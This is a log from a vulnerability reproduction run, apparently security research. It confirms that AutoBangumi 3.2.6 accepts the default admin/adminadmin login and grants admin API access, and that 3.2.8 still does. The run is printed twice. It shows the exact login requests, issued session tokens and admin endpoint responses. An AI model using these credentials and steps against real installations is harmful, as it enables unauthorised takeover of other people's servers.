========== VULNERABLE 3.2.6 attempt 1 ========== [+] attempt 1: startup seeded default admin user (add_default_user) [*] attempt 1: POST /api/v1/auth/login admin/adminadmin { "method": "POST", "path": "/api/v1/auth/login", "status": 200, "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc3Mn0.1tAcKf6lpeL3UM9PC3CUMwAd-kxI3r2cBCGpACOmK5Q; HttpOnly; Max-Age=86400; Path=/; SameSite=lax", "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc3Mn0.1tAcKf6lpeL3UM9PC3CUMwAd-kxI3r2cBCGpACOmK5Q\",\"token_type\":\"bearer\"}", "jwt_payload": null } [+] attempt 1: LOGIN SUCCEEDED with default credentials (HTTP 200 + admin JWT) [*] attempt 1: accessing admin-only endpoints with the session cookie { "method": "GET", "path": "/api/v1/rss", "status": 200, "set_cookie": null, "body": "[]", "jwt_payload": null } { "method": "GET", "path": "/api/v1/log", "status": 200, "set_cookie": null, "body": "[2026-07-03 22:36:10] INFO: INFO::uvicorn.error:Started server process [7]\n[2026-07-03 22:36:10] INFO: INFO::uvicorn.error:Waiting for application startup.\n[2026-07-03 22:36:10] INFO: INFO::module.core.program:\n[2026-07-03 22:36:10] INFO: INFO::module.core.program: _ ____ _\n[2026-07-03 22:36:10] INFO: INFO::module.core.program: /\\ | | | _ \\ (_)\n[2026-07-03 22:36:10] INFO: INFO::module.core.program: / \\ _ _| |_ ___ | |_) | __ _ _ __ __ _ _ _ _ __ ___ _\n[2026-07-03 22:36:10] INFO: INFO::module.core.program: / /\\ \\| | | | __/ _ \\| _ < / _` | '_ \\ / _` | | | | '_ ` _ \\| |\n[2026-07-03 22:36:10] INFO: INFO::module.core.program: / ____ \\ |_| | || (_) | |_) | (_| | | | | (_| | |_| | | | | | | |\n[2026-07-03 22:36:10] INFO: INFO::module.core.program:/_/ \\_\\__,_|\\__\\___/|____/ \\__,_|_| |_|\\__, |\\__,_|_| |_| |_|_|\n[2026-07-03 22:36:10] INFO: INFO::module.core.program: __/ |\n[2026-07-03 22:36:10] INFO: INFO::module.core.program: |___/\n[2026-07-03 22:36:10] INFO: INFO::module.core.program:Version 3.2.6 Author: EstrellaXD Twitter: https://twitter.com/Estrella_Pan\n[2026-07-03 22:36:10] INFO: INFO::module.core.program:GitHub: https://github.com/EstrellaXD/Auto_Bangumi/\n[2026-07-03 22:36:10] INFO: INFO::module.core.program:Starting AutoBangumi...\n[2026-07-03 22:36:11] INFO: INFO::module.database.combine:[Database] Schema version is now 9.\n[2026-07-03 22:36:11] INFO: INFO::module.database.user:[Database] Created default admin user\n[2026-07-03 22:36:11] INFO: INFO::module.core.program:[Core] No db file exists, create database file.\n[2026-07-03 22:36:11] INFO: INFO::uvicorn.error:Application startup complete.\n[2026-07-03 22:36:11] INFO: INFO::uvicorn.error:Uvicorn running on http://0.0.0.0:7892 (Press CTRL+C to quit)\n", "jwt_payload": null } [+] attempt 1: ADMIN ACCESS CONFIRMED (/api/v1/rss and /api/v1/log returned 200 with data) ========== VULNERABLE 3.2.6 attempt 2 ========== [+] attempt 2: startup seeded default admin user (add_default_user) [*] attempt 2: POST /api/v1/auth/login admin/adminadmin { "method": "POST", "path": "/api/v1/auth/login", "status": 200, "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc3Nn0.gIEJQSAYU8f9pe6VwZySCtC-RGqh_elum6lqg1cQqzE; HttpOnly; Max-Age=86400; Path=/; SameSite=lax", "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc3Nn0.gIEJQSAYU8f9pe6VwZySCtC-RGqh_elum6lqg1cQqzE\",\"token_type\":\"bearer\"}", "jwt_payload": null } [+] attempt 2: LOGIN SUCCEEDED with default credentials (HTTP 200 + admin JWT) [*] attempt 2: accessing admin-only endpoints with the session cookie { "method": "GET", "path": "/api/v1/rss", "status": 200, "set_cookie": null, "body": "[]", "jwt_payload": null } { "method": "GET", "path": "/api/v1/log", "status": 200, "set_cookie": null, "body": "[2026-07-03 22:36:15] INFO: INFO::uvicorn.error:Started server process [7]\n[2026-07-03 22:36:15] INFO: INFO::uvicorn.error:Waiting for application startup.\n[2026-07-03 22:36:15] INFO: INFO::module.core.program:\n[2026-07-03 22:36:15] INFO: INFO::module.core.program: _ ____ _\n[2026-07-03 22:36:15] INFO: INFO::module.core.program: /\\ | | | _ \\ (_)\n[2026-07-03 22:36:15] INFO: INFO::module.core.program: / \\ _ _| |_ ___ | |_) | __ _ _ __ __ _ _ _ _ __ ___ _\n[2026-07-03 22:36:15] INFO: INFO::module.core.program: / /\\ \\| | | | __/ _ \\| _ < / _` | '_ \\ / _` | | | | '_ ` _ \\| |\n[2026-07-03 22:36:15] INFO: INFO::module.core.program: / ____ \\ |_| | || (_) | |_) | (_| | | | | (_| | |_| | | | | | | |\n[2026-07-03 22:36:15] INFO: INFO::module.core.program:/_/ \\_\\__,_|\\__\\___/|____/ \\__,_|_| |_|\\__, |\\__,_|_| |_| |_|_|\n[2026-07-03 22:36:15] INFO: INFO::module.core.program: __/ |\n[2026-07-03 22:36:15] INFO: INFO::module.core.program: |___/\n[2026-07-03 22:36:15] INFO: INFO::module.core.program:Version 3.2.6 Author: EstrellaXD Twitter: https://twitter.com/Estrella_Pan\n[2026-07-03 22:36:15] INFO: INFO::module.core.program:GitHub: https://github.com/EstrellaXD/Auto_Bangumi/\n[2026-07-03 22:36:15] INFO: INFO::module.core.program:Starting AutoBangumi...\n[2026-07-03 22:36:15] INFO: INFO::module.database.combine:[Database] Schema version is now 9.\n[2026-07-03 22:36:15] INFO: INFO::module.database.user:[Database] Created default admin user\n[2026-07-03 22:36:15] INFO: INFO::module.core.program:[Core] No db file exists, create database file.\n[2026-07-03 22:36:15] INFO: INFO::uvicorn.error:Application startup complete.\n[2026-07-03 22:36:15] INFO: INFO::uvicorn.error:Uvicorn running on http://0.0.0.0:7892 (Press CTRL+C to quit)\n", "jwt_payload": null } [+] attempt 2: ADMIN ACCESS CONFIRMED (/api/v1/rss and /api/v1/log returned 200 with data) ========== FIXED 3.2.8 (negative control) attempt 1 ========== [!] fixed attempt 1: 3.2.8 STILL seeds default admin user on empty DB [*] fixed attempt 1: POST /api/v1/auth/login admin/adminadmin { "method": "POST", "path": "/api/v1/auth/login", "status": 200, "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc4MX0.Xni8lIOHs6xr6FM5-Fg1wehDPI_yQXHlFDQrtro0_3c; HttpOnly; Max-Age=86400; Path=/; SameSite=lax", "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc4MX0.Xni8lIOHs6xr6FM5-Fg1wehDPI_yQXHlFDQrtro0_3c\",\"token_type\":\"bearer\"}", "jwt_payload": null } [!] fixed attempt 1: 3.2.8 STILL accepts default-credential login (HTTP 200) ========== FIXED 3.2.8 (negative control) attempt 2 ========== [!] fixed attempt 2: 3.2.8 STILL seeds default admin user on empty DB [*] fixed attempt 2: POST /api/v1/auth/login admin/adminadmin { "method": "POST", "path": "/api/v1/auth/login", "status": 200, "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc4NX0.kGhrV2NofRxSRYj9peElgu1Z-qotBKZDwD1hps4SukA; HttpOnly; Max-Age=86400; Path=/; SameSite=lax", "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTc4NX0.kGhrV2NofRxSRYj9peElgu1Z-qotBKZDwD1hps4SukA\",\"token_type\":\"bearer\"}", "jwt_payload": null } [!] fixed attempt 2: 3.2.8 STILL accepts default-credential login (HTTP 200) ================ SUMMARY ================ VULN_SEED_LOG=1 VULN_LOGIN_OK=1 VULN_ADMIN_ACCESS_OK=1 FIXED_SEED_LOG=1 FIXED_LOGIN_OK=1 SOURCE_NOTE=add_default_user seeds admin/adminadmin (confirmed in source) [===] VULNERABILITY CONFIRMED: default admin/adminadmin credentials allow full admin login on AutoBangumi < 3.2.8 [===] NOTE: negative control shows 3.2.8 still accepts the default credentials; the referenced fix commit (487bdfec) addresses the SSRF issue (#1041), not the default-credentials seeding. ========== VULNERABLE 3.2.6 attempt 1 ========== [+] attempt 1: startup seeded default admin user (add_default_user) [*] attempt 1: POST /api/v1/auth/login admin/adminadmin { "method": "POST", "path": "/api/v1/auth/login", "status": 200, "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgwMX0.jDI6Q-jmEsXcdQDFLvj9qCnzvnzNh2pvenu3d-3E2tE; HttpOnly; Max-Age=86400; Path=/; SameSite=lax", "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgwMX0.jDI6Q-jmEsXcdQDFLvj9qCnzvnzNh2pvenu3d-3E2tE\",\"token_type\":\"bearer\"}", "jwt_payload": null } [+] attempt 1: LOGIN SUCCEEDED with default credentials (HTTP 200 + admin JWT) [*] attempt 1: accessing admin-only endpoints with the session cookie { "method": "GET", "path": "/api/v1/rss", "status": 200, "set_cookie": null, "body": "[]", "jwt_payload": null } { "method": "GET", "path": "/api/v1/log", "status": 200, "set_cookie": null, "body": "[2026-07-03 22:36:39] INFO: INFO::uvicorn.error:Started server process [7]\n[2026-07-03 22:36:39] INFO: INFO::uvicorn.error:Waiting for application startup.\n[2026-07-03 22:36:39] INFO: INFO::module.core.program:\n[2026-07-03 22:36:39] INFO: INFO::module.core.program: _ ____ _\n[2026-07-03 22:36:39] INFO: INFO::module.core.program: /\\ | | | _ \\ (_)\n[2026-07-03 22:36:39] INFO: INFO::module.core.program: / \\ _ _| |_ ___ | |_) | __ _ _ __ __ _ _ _ _ __ ___ _\n[2026-07-03 22:36:39] INFO: INFO::module.core.program: / /\\ \\| | | | __/ _ \\| _ < / _` | '_ \\ / _` | | | | '_ ` _ \\| |\n[2026-07-03 22:36:39] INFO: INFO::module.core.program: / ____ \\ |_| | || (_) | |_) | (_| | | | | (_| | |_| | | | | | | |\n[2026-07-03 22:36:39] INFO: INFO::module.core.program:/_/ \\_\\__,_|\\__\\___/|____/ \\__,_|_| |_|\\__, |\\__,_|_| |_| |_|_|\n[2026-07-03 22:36:39] INFO: INFO::module.core.program: __/ |\n[2026-07-03 22:36:39] INFO: INFO::module.core.program: |___/\n[2026-07-03 22:36:39] INFO: INFO::module.core.program:Version 3.2.6 Author: EstrellaXD Twitter: https://twitter.com/Estrella_Pan\n[2026-07-03 22:36:39] INFO: INFO::module.core.program:GitHub: https://github.com/EstrellaXD/Auto_Bangumi/\n[2026-07-03 22:36:39] INFO: INFO::module.core.program:Starting AutoBangumi...\n[2026-07-03 22:36:40] INFO: INFO::module.database.combine:[Database] Schema version is now 9.\n[2026-07-03 22:36:40] INFO: INFO::module.database.user:[Database] Created default admin user\n[2026-07-03 22:36:40] INFO: INFO::module.core.program:[Core] No db file exists, create database file.\n[2026-07-03 22:36:40] INFO: INFO::uvicorn.error:Application startup complete.\n[2026-07-03 22:36:40] INFO: INFO::uvicorn.error:Uvicorn running on http://0.0.0.0:7892 (Press CTRL+C to quit)\n", "jwt_payload": null } [+] attempt 1: ADMIN ACCESS CONFIRMED (/api/v1/rss and /api/v1/log returned 200 with data) ========== VULNERABLE 3.2.6 attempt 2 ========== [+] attempt 2: startup seeded default admin user (add_default_user) [*] attempt 2: POST /api/v1/auth/login admin/adminadmin { "method": "POST", "path": "/api/v1/auth/login", "status": 200, "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgwNX0.W7p9yJcfDiSMDQOvcbJSLnDi4uw8y8DxzBvXrNwfNbk; HttpOnly; Max-Age=86400; Path=/; SameSite=lax", "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgwNX0.W7p9yJcfDiSMDQOvcbJSLnDi4uw8y8DxzBvXrNwfNbk\",\"token_type\":\"bearer\"}", "jwt_payload": null } [+] attempt 2: LOGIN SUCCEEDED with default credentials (HTTP 200 + admin JWT) [*] attempt 2: accessing admin-only endpoints with the session cookie { "method": "GET", "path": "/api/v1/rss", "status": 200, "set_cookie": null, "body": "[]", "jwt_payload": null } { "method": "GET", "path": "/api/v1/log", "status": 200, "set_cookie": null, "body": "[2026-07-03 22:36:44] INFO: INFO::uvicorn.error:Started server process [7]\n[2026-07-03 22:36:44] INFO: INFO::uvicorn.error:Waiting for application startup.\n[2026-07-03 22:36:44] INFO: INFO::module.core.program:\n[2026-07-03 22:36:44] INFO: INFO::module.core.program: _ ____ _\n[2026-07-03 22:36:44] INFO: INFO::module.core.program: /\\ | | | _ \\ (_)\n[2026-07-03 22:36:44] INFO: INFO::module.core.program: / \\ _ _| |_ ___ | |_) | __ _ _ __ __ _ _ _ _ __ ___ _\n[2026-07-03 22:36:44] INFO: INFO::module.core.program: / /\\ \\| | | | __/ _ \\| _ < / _` | '_ \\ / _` | | | | '_ ` _ \\| |\n[2026-07-03 22:36:44] INFO: INFO::module.core.program: / ____ \\ |_| | || (_) | |_) | (_| | | | | (_| | |_| | | | | | | |\n[2026-07-03 22:36:44] INFO: INFO::module.core.program:/_/ \\_\\__,_|\\__\\___/|____/ \\__,_|_| |_|\\__, |\\__,_|_| |_| |_|_|\n[2026-07-03 22:36:44] INFO: INFO::module.core.program: __/ |\n[2026-07-03 22:36:44] INFO: INFO::module.core.program: |___/\n[2026-07-03 22:36:44] INFO: INFO::module.core.program:Version 3.2.6 Author: EstrellaXD Twitter: https://twitter.com/Estrella_Pan\n[2026-07-03 22:36:44] INFO: INFO::module.core.program:GitHub: https://github.com/EstrellaXD/Auto_Bangumi/\n[2026-07-03 22:36:44] INFO: INFO::module.core.program:Starting AutoBangumi...\n[2026-07-03 22:36:44] INFO: INFO::module.database.combine:[Database] Schema version is now 9.\n[2026-07-03 22:36:44] INFO: INFO::module.database.user:[Database] Created default admin user\n[2026-07-03 22:36:44] INFO: INFO::module.core.program:[Core] No db file exists, create database file.\n[2026-07-03 22:36:44] INFO: INFO::uvicorn.error:Application startup complete.\n[2026-07-03 22:36:44] INFO: INFO::uvicorn.error:Uvicorn running on http://0.0.0.0:7892 (Press CTRL+C to quit)\n", "jwt_payload": null } [+] attempt 2: ADMIN ACCESS CONFIRMED (/api/v1/rss and /api/v1/log returned 200 with data) ========== FIXED 3.2.8 (negative control) attempt 1 ========== [!] fixed attempt 1: 3.2.8 STILL seeds default admin user on empty DB [*] fixed attempt 1: POST /api/v1/auth/login admin/adminadmin { "method": "POST", "path": "/api/v1/auth/login", "status": 200, "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgxMH0.zKMG2oobFdi7yZyEqp2g8A5Zd1510Mr18zgkFwbiuYk; HttpOnly; Max-Age=86400; Path=/; SameSite=lax", "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgxMH0.zKMG2oobFdi7yZyEqp2g8A5Zd1510Mr18zgkFwbiuYk\",\"token_type\":\"bearer\"}", "jwt_payload": null } [!] fixed attempt 1: 3.2.8 STILL accepts default-credential login (HTTP 200) ========== FIXED 3.2.8 (negative control) attempt 2 ========== [!] fixed attempt 2: 3.2.8 STILL seeds default admin user on empty DB [*] fixed attempt 2: POST /api/v1/auth/login admin/adminadmin { "method": "POST", "path": "/api/v1/auth/login", "status": 200, "set_cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgxNH0._tDp1JVUdbW_hUGXKU32dSt4X8HHxwv3AhGE3GgEDYk; HttpOnly; Max-Age=86400; Path=/; SameSite=lax", "body": "{\"access_token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc4MzE3NTgxNH0._tDp1JVUdbW_hUGXKU32dSt4X8HHxwv3AhGE3GgEDYk\",\"token_type\":\"bearer\"}", "jwt_payload": null } [!] fixed attempt 2: 3.2.8 STILL accepts default-credential login (HTTP 200) ================ SUMMARY ================ VULN_SEED_LOG=1 VULN_LOGIN_OK=1 VULN_ADMIN_ACCESS_OK=1 FIXED_SEED_LOG=1 FIXED_LOGIN_OK=1 SOURCE_NOTE=add_default_user seeds admin/adminadmin (confirmed in source) [===] VULNERABILITY CONFIRMED: default admin/adminadmin credentials allow full admin login on AutoBangumi < 3.2.8 [===] NOTE: negative control shows 3.2.8 still accepts the default credentials; the referenced fix commit (487bdfec) addresses the SSRF issue (#1041), not the default-credentials seeding.